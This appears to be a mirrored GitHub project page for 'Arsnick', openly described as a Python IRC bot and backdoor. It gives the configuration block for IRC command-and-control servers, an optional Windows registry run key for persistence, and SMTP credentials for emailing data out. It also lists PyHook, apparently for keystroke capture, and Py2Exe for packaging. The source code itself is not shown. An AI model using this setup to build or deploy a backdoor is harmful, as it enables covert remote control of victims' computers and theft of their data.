项目作者: netzwerk

项目描述 :
Arsnick is a Python IRC Bot/Backdoor written in Python
高级语言: Python
项目地址: git://github.com/netzwerk/Arsnick.git
创建时间: 2019-04-17T16:31:26Z
项目社区:https://github.com/netzwerk/Arsnick

开源协议:

下载


Arsnick

Arsnick is a Python IRC Bot/Backdoor written in Python.

Some implementations and debugs are needed.

env :Python 2.7.5

Configuration

You can configure it by looking at the #CONFIG section in the source code:

  1. #CONFIG
  2. #winrgky = 'Windows Default Service' #Windows Registry Run Key
  3. ircs = 'irc.tiscali.it' #IRC Server
  4. ircp = 6667 #IRC Port
  5. ircc = '#yourircchannel' #IRC Channel
  6. ircs_backup = 'eris.us.ircnet.net' #Backup IRC Server
  7. ircp_backup = 6667 #Backup IRC Port
  8. ircc_backup = '#yourircchannel2' #Backup IRC Channel
  9. version = '1.0.1' #Arsnick Version
  10. username = 'sender@mail.com' #Sender Mail
  11. password = 'password' #Sender Mail password
  12. emailsender = 'ssender@mail.com' #Sender Mail Name
  13. #emailsmtp = 'smtp.mail.ru' #SMTP Server
  14. #emailsmtport = '465' #SMTP Port
  15. emailreceiver = 'receiver@mail.com' #Destination Mail

Once the confing has been done, run it and test it by sending commands using the dot for command triggering.
Ex.: .info

Requirements

Use ‘pip install’ for missing libraries.
PyHook - https://sourceforge.net/projects/pyhook/files/pyhook/1.5.1/

Compile

Py2Exe - http://www.py2exe.org/

This projects needs contributors